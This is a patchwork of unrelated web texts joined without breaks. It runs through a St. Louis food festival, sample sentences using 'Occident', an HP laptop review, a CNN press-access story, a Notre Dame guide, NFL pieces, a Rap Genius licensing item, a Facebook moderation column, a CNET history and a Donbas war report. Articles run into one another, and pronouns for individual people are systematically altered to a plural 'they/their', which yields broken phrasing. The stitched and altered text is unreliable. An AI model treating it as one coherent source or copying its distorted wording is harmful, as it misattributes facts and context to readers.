Kociela's voice was excited and they expressed their belief that this year Taste of St. Louis has the best line up it has ever featured. They focused on the festival's offerings and attempts to positively distinguish this year from previous years.
“It's something that hasn't been offered here, pairing big food network celebrity chefs with big rock bands,” Kociela said. “So we're kicking it up a notch for sure. It's going to be an amazing event.”
The organizer understands some people might choose to stay home but isn't worried about turnout. “It'd be their loss if they don't come out but that's OK too,” they said.
Taste of St. Louis will feature food by Annie Gunn's, Edgewild Restaurant and Winery, Bogart's Smokehouse and more St. Louis area restaurants. The event ends Sunday night with fireworks.
Inform our coverage
This report contains information gathered with the help of our Public Insight Network. To see what other PIN sources had to say about moving the Taste of St. Louis to Chesterfield, click here. To learn more about the network and how you can become a source, please click here.
My happiness itself do I throw out into all places far and wide 'twixt orient, noontide, and occident , to see if many human fish will not learn to hug and tug at my happiness;--
Bacolod City -- The programs and projects pledged by Agriculture Secretary Emmanuel PiAaAaAeA~ol to the farmworkers' organization here in Negros Occident are now being drafted, as the local agriculture office targets to deliver and implement them next year.
beaucoup moins que]La Tunisie n'estpas a l'abri d'attaques au couteau, comme en Occident , car la doctrine de Daech est axee sur la vengeance etant donne qu'ils sont devenus isoles et epuises et que leurs chefs ont ete elimines par les forces securitaires et militaires tunisiennes.
Writing in 1852 in their monthly journal, The Occident and American Jewish Advocate, Isaac Leeser asked their readers, "will not our friends.
Everything for all the tastes, you can enjoy on Cyprus and all these aspects form a multicultural place, where Occident meets Orient, Europe meets Africa and Asia.
Even in terms of beauty queens, nationalist Philippine history records only Villanueva as the first Carnival Queen when actually they were two: the Queen of the Occident , Marjorie Colton, a sister of the customs collector; and the Queen of the Orient, Villanueva.
an example to many countries that are unwilling to bend to the neo liberal dictates of the Occident '(Peter Koenig).
Selon le prefacier, [beaucoup moins que] ces femmes et hommes de lettres, auxquels il faudrait ajouter quelques jeunes ecrivains, font montre aujourd'hui d'une grande creativite romanesque qui, ajoute-t-il, leur a ouvert grande la voie du succes, que ce soit en Occident ou en Orient [beaucoup plus grand que].
In sections on discipline and critique, charting the comparative space, and comparing human rights narratives, they cover comparative law as discipline, critique and comparison, navigating the mainstreams, orientalizing comparative law's occident , Muslim veilings: critique of a comparative discourse, human rights and narratives of justifications, the discourse about "access to justice," and thick comparison.
The book views the geographic area as a land bridge connecting the Occident to the Orient, its history a melting pot of various cultures and waxing/waning cities.
Also scheduled to speak is curator Catherine David, most recently associated with Paris' Pompidou Center, who will share their thoughts on "Contemporary Art between the Occident and Orient.
Business laptops are usually big, boring machines designed to get the job done with little style. But HP is using its latest EliteBook, called the Folio 1040, to introduce an entirely new input method that's designed to replace the well-known clickpad.
It's known as a ForcePad, and while it looks just like a clickpad, there's a big difference: there's no click. When you go to click something on the screen, you're supposed to exert the same amount of force that you would on a clickpad — even though there's no give. It feels like pushing against the palmrest of a laptop, and it's definitely odd at first. The software pumps out a (thankfully optional) fake "click" sound to try and make it less strange, but it doesn't help. We first saw the technology (which comes from Synaptics) over a year ago, and this is the first machine to use it.
The idea is that you can do new gestures with the TouchPad. For instance, you can scroll down a page without moving your finger simply by applying pressure up or down, but it doesn't seem much better than flicking with your fingers. The real benefit is size: removing the hinge makes the whole assembly about half as thick as a traditional clickpad, which means HP could slim down the EliteBook a bit more. We're not sure that the tradeoff is worth it, but perhaps we just need more software that takes advantage of the controls offered by the ForcePad.
"We were ultra aggressive on weight and thinness"
HP says that engineers were "ultra aggressive on weight and thinness" when designing the EliteBook Folio 1040, and ultimately they were able to make the 14-inch ultrabook about 16 percent thinner and 7 percent lighter than the EliteBook Folio 9470m that it replaces. At 3.3 pounds and 0.63 inches thick, it's a bit thicker and heavier than some of our favorite ultrabooks like the Acer Aspire S7, but at least there's a good reason for it: HP says the machine meets ruggedization standards (MIL-STD 810G), so it should be able to hold up to the rigors of a business lifestyle.
For the past couple of years, HP's tried to make its EliteBook line a bit more exciting by blurring the line between it and the company's consumer ultrabooks. The ultrabook tapers nicely and is made of aluminum (save for a soft-touch bottom made of magnesium alloy), and it has a blacklit keyboard. Features like a matte display, a TPM security chip, a Smart Card reader, and a docking port reveal its business intentions, but gone are the Ethernet plug and legacy VGA connector found on its predecessor.
HP calls the EliteBook Folio 1040 its top-of-the-line business ultrabook, and it's appropriately specced out. The company's offering dual-core Haswell processors (in both Core i5 and i7 varieties), and it comes with a 120GB SSD and up to 8GB of RAM. Depending on which processor you opt for you'll either get Intel's HD 4600 or HD 5000 integrated graphics, both of which should be plenty sufficient for business tasks. Thankfully, it also comes with the option of a 1920 x 1080 display (with or without touch) in addition to its standard 1600 x 900 screen. It's not a particularly high-quality unit — there's no IPS here — but the added resolution is much appreciated.
Ultimately, the EliteBook Folio 1040 G1 looks like it could be a good option — if you're willing to give the click-less ForcePad a try. It's available now for $1,299.
Correction: An earlier version of this article stated that the laptop's bottom panel was made of plastic. It is not; it is a magnesium alloy panel covered with a black soft-touch finish.
Story highlights CNN, The New York Times, the Los Angeles Times, Politico and Buzzfeed were blocked from an off-camera press briefing Friday
CNN anchor Brooke Baldwin also responded on air after learning the White House had blocked the news outlets
(CNN) CNN's Jake Tapper said there's one word to describe the White House's decision to block several news organizations from a press briefing: "un-American."
CNN, The New York Times, the Los Angeles Times, Politico and Buzzfeed were blocked from an off-camera press briefing Friday held by White House press secretary Sean Spicer just hours after President Donald Trump again said much of the press represents "the enemy of the people," this time during a speech at the Conservative Political Action Conference in Washington.
On Thursday, CNN reported that the FBI refused a request from the White House to knock down recent reports that President Donald Trump's campaign had been in contact with Russians known to US intelligence.
"The Trump White House thinks it can punish reporters for sharing with you facts that they do not like," Tapper said.
"Make no mistake about what's happening here," Tapper continued. "A White House that has had some difficulty telling the truth and has seemed to have trouble getting up to speed on the competent functioning of government and a President who seems particularly averse to any criticism and has called the press the 'enemies of the American people,' they're taking the next step in avoiding checks and balances and accountability."
Read More
A popular cathedral in Paris, the Notre Dame Cathedral has been famous in photo albums of tourists as well as the pages of literature and movie screens. However, aside from being a popular tourist attraction in Paris, the Notre Dame Cathedral is also a Roman Catholic cathedral that has a Gothic architecture and design. Being one of the finest examples of French Gothic architecture that became prevalent in Europe and Paris, the naturalist sculptures and stained glass are set against the Romanesque architecture. Inside is the cathedra (official chair) of the Archbishop of Paris. It is also believed that the Notre-Dame cathedral treasury has a reliquary with the Crown of Thorns.
Outside of Notre-Dame
Some of the unique features of the Notre Dame Cathderal in Paris are the flying buttress included for exterior supports. More statues were then erected outside the cathedral to serve as support for the columns and water spouts–some of these are the gargoyles that most people are familiar with in Paris. Initially, the gargoyles were colored as well as the exterior of the cathedral, but the years faded the colors off the Notre Dame leaving behind the grey stone. In the west front of the cathedral are the twin towers and rose windows, three doorways with rows of saints and sculpted tympanums–Life of St.Anne in the right, Last Judgement at the center, and Life of the Virgin at the left.
Inside the cathedral
Inside the cathedral are long nave with solid capitals and a marble Pieta done by Coustou on the high altar. Some of the things to see in Notre Dame Cathedral in Paris are the Galerie des Chimeres or the Grand Gallery that connects the two west towers and where the gargoyles could be found. There is also the King's Gallery that is a line of statues of the 28 kings of Judah and Israel. There is also the West Rose Window in Paris which dates back to 1220.
Treasury of the Notre Dame
Entrance to the cathedral is free of charge and it is open for everyone, everyday of the year. Most of the visitors of Notre Dame Cathderal in Paris are tourists and pilgrims. There are organized tours in the cathedral everyday and it lasts approximately one hour. The tour in Paris is focused on the cathedral as an art and the art pieces inside it including sculptures, paintings, stained glass, history, and architecture. There are also audioguides available for people who do not want to join tours in groups and would prefer to explore the cathedral by themselves.
Inside, there is also the Treasury of the Notre Dame in Paris which is mainly the location of the sacristy and the liturgical objects made of gold. Some of the historical and art pieces housed by the treasury are from 17th and 18th century as well as the 19th century workmanship. Tours on the cathedral towers are also allowed, where to view of Paris from the top of Notre Dame is possible. Tourists could also get a view of the roof, spires, and largest bell–Emmanuel Bell–of this famous cathedral. However, reaching the top of the Notre Dame will be a challenge to some people as it requires 387 steps to the top.
Despite the large number of tourists exploring the Notre Dame Cathedral in Paris, its official still considers Notre Dame first as a place of worship so tourists are expected to dress and behave accordingly. People who are touring in groups in Paris are recommended to remain silent and respect the people praying inside the Notre Dame.
Notre Dame Cathedral Paris, France 5 (100%) 94 votes (100%)votes
The fans of Raider Nation have been clear about which team they're rooting for in this Sunday's Super Bowl matchup with the majority cheering on the Seattle Seahawks. Most can't stomach the idea of the hated Denver Broncos moving in to a tie with the Raiders for most Super Bowl wins in the AFC West. Some of the old school fans may still harbor some animosity for the former division rival Seahawks (in the AFC West from 1977-2002) but that sentiment is rare. The presence of some former Raiders in Super Bowl XLVIII may complicate things for some but just in case you weren't sure who to root for this list might help swing your vote one way or the other.
Denver Broncos:
Michael Huff (Safety) – The Raiders spent their seventh overall pick on Huff in 2006 ahead of first round standouts like Jay Cutler, Haloti Ngata, Tamba Hali, and Nick Mangold but at least they didn't draft Matt Leinart. Huff never lived up to their billing as a top ten pick and was often the source of frustration for Raider Nation. They were always a solid player who could play both safety and corner but they were just never good enough to justify their draft position. After being released by the Raiders last offseason, Huff signed a three-year deal with the Ravens but was cut in November. They then signed on with the Broncos as a reserve player. Huff likely won't see the field much on Sunday but they definitely won't be getting any love from Raider Nation.
Greg Knapp (QB Coach) – Knapp is the QB coach for the Broncos, which means they are probably always buying John Elway dinner for giving them the easiest job in the NFL in “coaching” Peyton Manning. They probably share some wisdom with backup Brock Osweiler but that might be all they do. If you ask most Raiders fans, they'll tell you that Knapp was equally useless in their tenures as the offensive coordinator in Oakland (2007-08, 2012). Their second stint saw the Raiders become the worst rushing offense in the league and their gameplan every week seemed to revolve around Carson Palmer throwing the ball 100 times. Knapp is another not so beloved former Raider patrolling the sidelines on Sunday.
Seattle Seahawks:
Chris Clemons (LB/DE) – Chris Clemons spent only one season in Oakland but still managed to make a significant impact with their pass rushing skills. Clemons notched eight sacks and two forced fumbles in situational pass rushing duty for the Raiders. Their play priced out the Raiders and earned them a five-year, $18 million deal with the Philadelphia Eagles. The Eagles traded them to Seahawks in 2010 after two years of subpar production (7 sacks) but Clemons rebounded in Seattle with 11 sacks in their first season. Clemons wasn't in Oakland long enough for the fans to build any kind of emotional connection so most are indifferent to them winning or losing on Sunday.
Paul McQuistan (OT/OG) – Paul McQuistan was drafted by the Raiders in the third round of the 2006 NFL Draft and they were named a starter for their rookie season. McQuistan was benched six games in to the season but became a starter in 2007 before suffering an injury in 2008 and being released by the Raiders. They then bounced around the league a little bit with Jacksonville and Cleveland before landing in Seattle in 2011. McQuistan is a versatile backup and made a significant impact for Seattle with their rash of injuries to the offensive line. They won't see much playing time on Sunday and is another player Raider Nation is very much indifferent about.
Zach Miller (TE) – Zach Miller was drafted in the second round of the 2007 NFL Draft and eventually made the Pro Bowl as an alternate for the 2010 season. They were the Raiders only consistent receiving threat for many years during the dark ages of the Jamarcus Russell era and even lead the team in receiving in 2008, 2009, and 2010. Miller had enough of Oakland and signed a big money five-year deal with the Seahawks in 2011. They haven't replicated their Raiders receiving numbers in Seattle but they have finally tasted success in the regular and postseason. Miller was a fan favorite and did great things in silver and black but they cant be faulted for seeking greener pastures up north. Many Raiders fans still wear their jersey on gameday at the Coliseum and would be just fine with the big tight end becoming a champion.
Tom Cable (OL coach/Assistant HC) – Tom Cable was promoted to interim head coach when the Raiders fired the ineffective Lane Kiffin. Cable became the team's head coach for two more seasons and lead them to a combined record of 13-19. However in their second season the Raiders finished a strong 8-8 and went 6-0 in their division for the first time in franchise history. Unfortunately they had their fair share of controversy because of an incident involving an assault on a Raiders scout. That incident combined with Cable's lack of star power was likely what lead Al Davis to now renew their contract. Cable landed on their feet as the offensive line coach and assistant head coach with Seattle less than two weeks later. Seattle's offensive lines is now one of the best in the league and Cable deserves their fair share of the credit. There are a number of Raiders fans that remain thankful for their efforts in Oakland and wish the big man never left so its unlikely they would be upset if they win a championship.
So there you have it. If the choice of who to root for wasn't already easy for you, the list above should clear things up a bit. It comes down to one simple question, would you rather see underachievers like Huff and Knapp win a Super Bowl, or faithful Raiders servants like Miller and Cable win? That might as well be a rhetorical question.
If you like what you just read, check out Khaled's Chelsea Football Club and European soccer blog on the FanSided network called The Pride of London.
President Donald Trump, fresh from a round of diplomacy with Japan's prime minister, renewed a feud with billionaire Mark Cuban on Sunday, a familiar foil with whom he's sparred in the past.
As the world grappled with North Korea's latest act of aggression —firing off anew ballistic missile—Trump harangued the outspoken investor in a series of early morning tweets. Along with defending their crackdown on immigration, Trump blasted Cuban as being "not smart enough" to be leader of the free world.
The president also took a swipe at recent court decisions that dealt stinging blows to their travel ban, which they insist is necessary for national security purposes.
For their part, Cuban —who supported Democratic contender Hillary Clinton in the general election—dismissed the broadside with a simple "LOL". However, Cuban then tweeted an image of a 2016 letter they wrote to Trump, offering them support while imploring them to master the issues they would face as president.
It wasn't immediately clear why Trump lashed out at Cuban, seemingly without provocation, but the two billionaires have a lengthy and checkered history of exchanging trash talk.
At the height of the general election, the Dallas Mavericks owner was once approached by a group of dissident Republicans to run as an independent candidate, a move Cuban ultimately ruled out. Trump has made sport of name-calling Cuban on social media, at one point referring to them as "dopey." Cuban often downplays Trump's insults, or responds with thinly veiled criticism.
Rejoice just a little bit, Dallas Cowboys fans. The NFL released the offseason workout schedules that include OTAs and required minicamps. These will be the first glimpses of the 2016 edition of the Cowboys working out together in preparation for erasing all lingering nightmares of the 2015 season. Of course we have to go through the draft first, perhaps THE highlight of the NFL offseason, but after that, we look forward to the OTAs and minicamps.
The Cowboys scheduled activities.
First Day: April 18 OTA Offseason Workouts: May 24-26, May 31, June 1-2, June 6-8 Mandatory Minicamp: June 14-16
As a reminder, the Collective Bargaining Agreement governs all of these activities and is broken down into three phases.
Phase One consists of the first two weeks of the program with activities limited to strength and conditioning and physical rehabilitation only. Phase Two consists of the next three weeks of the program. On-field workouts may include individual player instruction and drills as well as team practice conducted on a "separates" basis. No live contact or team offense vs. team defense drills are permitted. Phase Three consists of the next four weeks of the program. Teams may conduct a total of 10 days of organized team practice activity, or "OTAs". No live contact is permitted, but 7-on-7, 9-on-7, and 11-on-11 drills are permitted. Article 22 of the Collective Bargaining Agreement stipulates that clubs may hold one mandatory minicamp for veteran players. This minicamp, noted below, must occur during Phase Three of the offseason program.
In addition, there are rookie-only activities. They are governed by the following rule.
Earlier this week, news surfaced that the National Music Publishers' Association (NMPA) has filed take-down notices against 50 unlicensed and "undesirable" lyric websites. The copyright infringement study was spearheaded in part by University of Georgia researcher David Lowery, also a member of Camper Van Beethoven and Cracker.
The top offender on the study's list was Rap Genius, the "hip-hop Wikipedia" that lets users annotate lyrics. Rap Genius, meanwhile, defended itself as a distinguished "interactive, vibrant art experience created by a community of volunteer scholars," in a statement to The New York Times.
Now, Billboard reports that Rap Genius has entered a licensing agreement with Sony/ATV Music Publishing. The deal was made "earlier this year," according to Rap Genius. As Billboard notes, Sony/ATV is the largest music publisher in the world and handles about 31% of music publishing globally. Still, most of the lyrics on Rap Genius currently remain unlicensed. The site is currently working on deals with other publishers, according to a statement received by Billboard.
According to NMPA President and CEO David Israelite, the NMPA's goal isn't to shut down these lyric sites, but rather make more licensing deals happen. "We simply want those that are making money off lyrics to be business partners with the songwriters who created the content that is the basis of the sites," he's quoted as saying by Billboard.
Activist and writer Ijeoma Oluo is the latest to suffer for Facebook's inability — or perhaps unwillingness — to improve its reporting and moderation infrastructure. After receiving hundreds of racist and threatening messages in response to a joke they made on Twitter, Oluo began posting screenshots when it was clear that days of reporting did nothing. Facebook's response was to suspend their account.
You can read Oluo's account of things here, including some screenshots of the type of abuse they were receiving. Twitter, they said, was responsive. Facebook, not so much.
Facebook later reinstated their account, calling the suspension a “mistake.” I've asked the company for the rationale behind the suspension.
We talked with another activist recently, Leslie Mac, who like Oluo spoke out on racism using the platform, and like Oluo was suspended from it. It happened to Shaun King, too, after they posted a racist email they received.
The pattern isn't hard to figure out: when a person (often a person of color, often a woman, often both) is singled out by popular accounts and pages for something they've said or done, the mob descends. Abusive messages, comments and tweets arrive by the truckload — and while the target can only block and report so fast, groups of hundreds or thousands can flag a post or account so voluminously that it is taken offline.
Sure, that's a “mistake.” The way the entire system Facebook has established for moderating the global conversation is a mistake. It is, at the very least, fundamentally flawed and inadequate.
Facebook and other platforms love to talk about the empowering nature of a one-to-many platform. They fail to address the problem that occurs when the platform is inverted and becomes many-to-one. There isn't really a solution for the constant dogpiles that occur when someone incurs the wrath of an entire contingent of highly vocal abusers. Just let it happen and then sweep the “mistake” under the rug with the rest of them.
I happened to hear about Oluo's situation by chance, but no doubt this is happening to many groups and many people whom I would never hear about. Are you one of them? Have you experienced this?
Maybe the mistake is people thinking these platforms are able to protect them at all. If so, the echo chamber will intensify as Facebook and other services may find themselves hosts to chilled speech under the de facto sway of countless angry mobs.
Facebook confirmed the content takedowns and suspension as mistakes on the part of its moderation team. They later sent a statement saying “We're very sorry about this mistake. We allow discussions of racism but do not allow people to harass or attack others on Facebook.” It seems they got it backwards in this case!
I've also asked Oluo for more information and will update the post if I hear back.
American media website about technology and consumer electronics
"CNET Networks" redirects here. For the successor online media company, see CBS Interactive
"News.com" redirects here. For the Australian news website, see news.com.au
CNET (stylized as c|net) is an American media website that publishes reviews, news, articles, blogs, podcasts and videos on technology and consumer electronics globally. Founded in 1994 by Halsey Minor and Shelby Bonnie, it was the flagship brand of CNET Networks and became a brand of CBS Interactive through CNET Networks' acquisition in 2008.[3][4][5][6] CNET originally produced content for radio and television in addition to its website and now uses new media distribution methods through its Internet television network, CNET Video, and its podcast and blog networks.
In addition, CNET currently has region-specific and language-specific editions. These include the United Kingdom, Australia, China, Japan, French, German, Korean and Spanish. According to third-party web analytics providers, Alexa and SimilarWeb, CNET is the highest-read technology news source on the Web, with over 200 million readers per month, being among the 200 most visited websites globally, as of 2015.[7][8][9]
History [ edit ]
Origins [ edit ]
Logo of CNET Networks prior to acquisition by CBS Interactive
In 1994, with the help from Fox Network co-founder[10] Kevin Wendle and former Disney creative associate Dan Baker,[11] CNET produced four pilot television programs about computers, technology, and the Internet. CNET TV was composed of CNET Central, The Web, and The New Edge.[12][13] CNET Central was created first and aired in syndication in the United States on the USA Network. Later, it began airing on USA's sister network Sci-Fi Channel along with The Web and The New Edge.[12] These were later followed by TV.com in 1996. Current American Idol host Ryan Seacrest first came to national prominence at CNET, as the host of The New Edge and doing various voice-over work for CNET.
In addition, CNET produced another television technology news program called News.com that aired on CNBC beginning in 1999.[11]
From 2001 to 2003, CNET operated CNET Radio on the Clear Channel-owned KNEW (910) in the San Francisco Bay Area, WBPS (890) in Boston and on XM Satellite Radio. CNET Radio offered technology-themed programming. After failing to attract a sufficient audience, CNET Radio ceased operating in January 2003 due to financial losses.[14]
Acquisitions and expansions [ edit ]
As CNET Networks, the site made various acquisitions to expand its reach across various web platforms, regions, and markets.
In July 1999, CNET acquired the Swiss-based company GDT.[15] GDT was later renamed to CNET Channel.[16]
In 1998, CNET granted the right to Asiacontent.com to set up CNET Asia and the operation was brought back in December 2000.[17]
In January 2000, the same time CNET became CNET Networks,[18] they acquired comparison shopping site mySimon for $736 million.[19][20]
In October 2000, CNET Networks acquired ZDNet for approximately $1.6 billion.[21][22][23] In January 2001, Ziff Davis Media, Inc. reached an agreement with CNET Networks, Inc. to regain the URLs lost in the 2000 sale of Ziff Davis, Inc. to SoftBank Corp. a publicly traded Japanese media and technology company. In April 2001, CNET acquired TechRepublic Inc., which provides content for IT professionals from Gartner, Inc., for $23 million in cash and stock.[24][25]
On July 14, 2004, CNET announced that it would acquire Webshots, the leading photography website for $70 million ($60 million in cash, $10 million in deferred consideration),[26] completing the acquisition that same month.[27][28] In October 2007, they sold Webshots to American Greetings for $45 million.[29]
In December 2006, James Kim, an editor at CNET, died in the Oregon wilderness. CNET hosted a memorial show and podcasts dedicated to him.
On March 1, 2007, CNET announced the public launch of BNET, a website targeted towards business managers. BNET had been running under beta status since 2005.[30]
On May 15, 2008 it was announced that CBS Corporation would buy CNET Networks for US$1.8 billion.[4][5][31][32] On June 30, 2008, the acquisition was completed.[33] Former CNET properties are now part of CBS Interactive. CBS Interactive now owns many domain names originally created by CNET Networks, including download.com, downloads.com, upload.com, news.com, search.com, TV.com, mp3.com, chat.com, computers.com, shopper.com, radio.com, com.com, and cnet.com.
On September 19, 2013 CBS Interactive launched a Spanish language sister site under the name CNET en Español.[34] It focuses on topics of relevance primarily to Spanish-speaking technology enthusiasts. The site offered a "new perspective" on technology and is under the leadership of managing editor Gabriel Sama.[35]
In March 2014, CNET refreshed its site by merging with CNET UK and vowing to merge all editions of the agency into a unified agency. This merges brought many changes, foremost of which would be a new user interface and the renaming of CNET TV as CNET Video.
Gamecenter [ edit ]
CNET launched a website to cover video games, CNET Gamecenter, in the middle of 1996.[36] According to the San Francisco Chronicle, it was "one of the first Web sites devoted to computer gaming news".[37] It became a leading game-focused website;[38][39] in 1999, PC Magazine named it one of the hundred-best websites in any field, alongside competitors IGN and GameSpot.[40] According to Gamecenter head Michael Brown, the site received between 50,000 and 75,000 daily visitors by late 2000.[36] In May 2000, CNET founded the Gamecenter Alliance network to bring Gamecenter and four partner websites, including Inside Mac Games, under one banner.[41]
On July 19, 2000, CNET made public its plan to buy Ziff-Davis and its ZDNet Internet business for $1.6 billion.[42] Because ZDNet had partnered with SpotMedia—parent company of GameSpot—in late 1996,[43] the acquisition brought both GameSpot and Gamecenter under CNET's ownership.[38][44] Later that year, The New York Times described the two publications as the "Time and Newsweek of gaming sites". The paper reported that Gamecenter "seem[ed] to be thriving" amid the dot-com crash, with its revenue distributed across online advertising and an affiliate sales program with CNET's Game Shopper website,[36] launched in late 1999.[45]
Following an almost $400 million loss at CNET as a result of the dot-com crash, the company ended the Gamecenter Alliance network in January 2001.[44][46] On February 7, Gamecenter itself was closed in a redundancy reduction effort, as GameSpot was the more successful of the two sites.[44][37] Around 190 jobs were cut from CNET during this period,[46] including "at least 20" at Gamecenter, according to the San Francisco Chronicle.[37] Discussing the situation, Tom Bramwell of Eurogamer reported, "It is thought[...] that very few if any of the website's staff will move sideways into jobs at GameSpot, now the company's other gaming asset."[46] The Washington Post later noted that Gamecenter was among the "popular video-game news sites" to close in 2001, alongside Daily Radar.[47]
Malware infection in downloads [ edit ]
With a catalog of more than 400,000 titles, the Downloads section of the website allows users to download popular software. CNET's download.com provides Windows, Macintosh and mobile software for download. CNET claims that this software is free of spyware, but independent sources have confirmed that this is not the case. Download.com not only hosts software with malware, but their own download wrapper contains adware and bloatware.[48][49][50][51][52][53]
Dispute with Snap Technologies [ edit ]
In 1998, CNET was sued by Snap Technologies, operators of the education service CollegeEdge, for trademark infringement relating to CNET's ownership of the domain name Snap.com, due to Snap Technologies already owning a trademark on its name.[54]
In 2005, Google representatives refused to be interviewed by all CNET reporters for a year after CNET published Google's CEO Eric Schmidt's salary, named the neighborhood where they live, some of their hobbies and political donations.[55] All the information had been gleaned from Google searches.[56][57]
On October 10, 2006, Shelby Bonnie resigned as chairperson and CEO, in addition to two other executives, as a result of a stock options backdating scandal that occurred between 1996 and 2003.[58] This would also cause the firm to restate its financial earnings over 1996 through 2003 for over $105 million in resulting expenses.[59] The Securities and Exchange Commission later dropped an investigation into the practice. Neil Ashe was named as the new CEO.[60][61][62]
In 2011, CNET and CBS Interactive were sued by a coalition of artists (led by FilmOn founder Alki David) for copyright infringement by promoting the download of LimeWire, a popular peer to peer downloading software.[63][64] Although the original suit was voluntarily dropped by Alki David, they vowed to sue at a later date to bring "expanded"[65] action against CBS Interactive. In November 2011, another lawsuit against CBS Interactive was introduced, claiming that CNET and CBS Interactive knowingly distributed LimeWire, the file sharing software.[66]
Hopper controversy [ edit ]
In January 2013, CNET named Dish Network's "Hopper with Sling" digital video recorder as a nominee for the CES "Best in Show" award (which is decided by CNET on behalf of its organizers), and named it the winner in a vote by the site's staff. However, CBS abruptly disqualified the Hopper, and vetoed the results because the company was in active litigation with Dish Network. CNET also announced that it could no longer review any product or service provided by companies that CBS are in litigation with (which also includes Aereo). The new vote subsequently gave the Best in Show award to the Razer Edge tablet instead.[67][68][69]
Dish Network's CEO Joe Clayton said that the company was "saddened that CNET's staff is being denied its editorial independence because of CBS' heavy-handed tactics."[67] On January 14, 2013, editor-in-chief Lindsey Turrentine addressed the situation, stating that CNET's staff were in an "impossible" situation due to the conflict of interest posed by the situation, and promised that they would do everything within their power to prevent a similar incident from occurring again. The conflict also prompted one CNET senior writer, Greg Sandoval, to resign.[68]
The decision also drew the ire of staff from the Consumer Electronics Association, the organizers of CES; CEO Gary Shapiro criticized the decision in a USA Today op-ed column and a statement by the CEA, stating that "making television easier to watch is not against the law. It is simply pro-innovation and pro-consumer." Shapiro felt that the decision also hurt the confidence of CNET's readers and staff, "destroying its reputation for editorial integrity in an attempt to eliminate a new market competitor." As a result of the controversy and fearing damage to the show's brand, the CEA announced on January 31, 2013 that CNET will no longer decide the CES Best in Show award winner due to the interference of CBS (the position has been offered to other technology publications), and the "Best in Show" award was jointly awarded to both the Hopper with Sling and Razer Edge.[69]
Sections [ edit ]
Reviews [ edit ]
The reviews section of the site is the largest part of the site, and generates over 4,300 product and software reviews per year. The Reviews section also features Editors' Choice Awards, which recognize products that are particularly innovative and of the highest quality.
News [ edit ]
CNET News (formerly known as News.com), launched in 1996, is a news website dedicated to technology. CNET News received the National Magazine Award for General Excellence Online.[70] Content is created by both CNET and external media agencies as news articles and blogs.
Video [ edit ]
CNET Video, formerly called CNET TV, is CNET's Internet video channel offering a selection of on-demand video content including video reviews, "first looks," and special features. CNET editors such as Brian Cooley, Jeff Bakalar, Bridget Carey and Brian Tong host shows like Car Tech, The 404 Show, Quick Tips, CNET Top 5, Update, The Apple Byte, video prizefights, and others, as well as special reports and reviews. On April 12, 2007, CNET Video aired its first episode of CNET LIVE, hosted by Brian Cooley and Tom Merritt. The first episode featured Justin Kan of justin.tv.[71][72]
How To [ edit ]
Officially launched August 2011, How To is the learning area of CNET providing tutorials, guides and tips for technology users.
See also [ edit ]
Raiders ‘likely' to play in Oakland through 2020, Coliseum official says
Oakland Raiders' Michael Crabtree celebrates their second-quarter touchdown catch with Jared Cook against the New York Jets during a game at the Oakland Coliseum on Sept. 17. The team may likely stay in Oakland through the 2020 season, a Coliseum official said Monday. The Raiders “might likely” play in Oakland through the 2020 season as they wait for their $1.9 billion Las Vegas stadium to be built, a Coliseum official said Monday. less Oakland Raiders' Michael Crabtree celebrates their second-quarter touchdown catch with Jared Cook against the New York Jets during a game at the Oakland Coliseum on Sept. 17. The team may likely stay in Oakland ... more Photo: Scott Strazzante, The Chronicle Photo: Scott Strazzante, The Chronicle Image 1 of / 12 Caption Close Raiders ‘likely' to play in Oakland through 2020, Coliseum official says 1 / 12 Back to Gallery
The Raiders “might likely” play in Oakland through the 2020 season as they wait for their $1.9 billion Las Vegas stadium to be built, a Coliseum official said Monday.
Scott McKibben, executive director of the Oakland Alameda County Coliseum Authority — who's had informal conversations in recent weeks with Raiders President Marc Badain — said the team may need to stay in Oakland longer than anticipated.
“For sure we are talking about a one-year extension and there's a real likelihood we could be talking about two years,” McKibben said.
The NFL team's current contract with the authority will last through the 2018 season. Under the agreement, the Raiders pay $3.5 million in rent, and its revenue from parking, concessions, beverages and club dues are split with the public agency. The city and county pay for game-day expenses, such as police overtime and converting the field when the A's and Raiders seasons overlap.
Now Playing:
McKibben said that while there's no pressure to hammer out a lease extension, “it'd be to everyone's benefit” to get it done in the coming months as soon as the Raiders have a better sense of their timetable for construction in Las Vegas.
Clark County officials had wanted the 65,000-seat domed stadium to be built in time for the 2020 season, but local news reports indicate it has run into a number of problems around parking and transportation, a community benefits deal and a joint-use agreement with the University of Nevada, Las Vegas.
As in the past, negotiations for an extension in Oakland will happen between McKibben and the team's owners and managers, and any agreement must be approved by the Oakland City Council, Alameda County Board of Supervisors and Coliseum Authority Board of Directors.
But some East Bay officials are less eager than McKibben to keep the team in town.
Oakland Council President Larry Reid, who's vice chair of the Coliseum Authority, said that they would vote against a lease extension.
“The NFL and the Raiders totally disrespected the city of Oakland and Raiders fans,” they said. “If the Raiders are gone, they're gone. I don't want anything to do with them.”
But “given the difficulties they're having in Vegas,” Reid said, the Coliseum Authority could now be in a better bargaining position to ask for a rent increase or other deals favorable to the city and county.
Kimberly Veklerov is a San Francisco Chronicle staff writer. Email: kveklerov@sfchronicle.com Twitter: @kveklerov
Separatist commander acknowledges heavy losses near Avdiivka Friday, April 8, 2016 12:00:39 PM
The founder of the Vostok separatist battalion, Alexander Khodakovsky, acknowledged that 13 in their unit were killed and 90 were wounded between March 7th and April 7th.
“The biggest losses were suffered in the industrial zone between Yasynuvata and Avdiivka. This is becoming, as our fighters say, the second Airport*,” they wrote on their LiveJournal page.
“I do not have the information about the losses in the other units, but I can guess that they are considerable too… Only the Vostok battalion and the units of the Ministry of Internal Affairs are in the epicenter of the fighting. So we are carrying the heaviest burden” they stated.
They noted that the Avdiivka industrial zone has lost its strategic value since “no matter what the outcome of the fighting is, this stretch of the route [Donetsk-Horlivka] will not be safe to travel until the war is over. The only things that make us fight there is that we don't want to give up our territory”.
“There are heavy artillery barrages in the area and even large caliber mortars are used… For us the situation is different now [from the fighting at the Airport]. We have crossed the open spaces and are now directly facing the Ukrainian forces. The advantage is on their side. They [the Ukrainian Forces] can reach their positions directly from their stationary locations. And we, on the other hand, have to cross the fields and open areas to bring the supplies and replace the soldiers,” they added.
Alexander Khodakovsky worked at the Security Service of Ukraine (SSU) but defected at the beginning of the conflict in the Donbas. They became a prominent separatist commander and the founder of the Vostok Battalion. They vehemently support the annexation of the Donbas by Russia.
*The Donetsk Airport is where the heaviest fighting took place last year between Ukrainian forces and the pro-Russian separatists
Share
Comments
Please enable JavaScript to view the comments powered by Disqus.
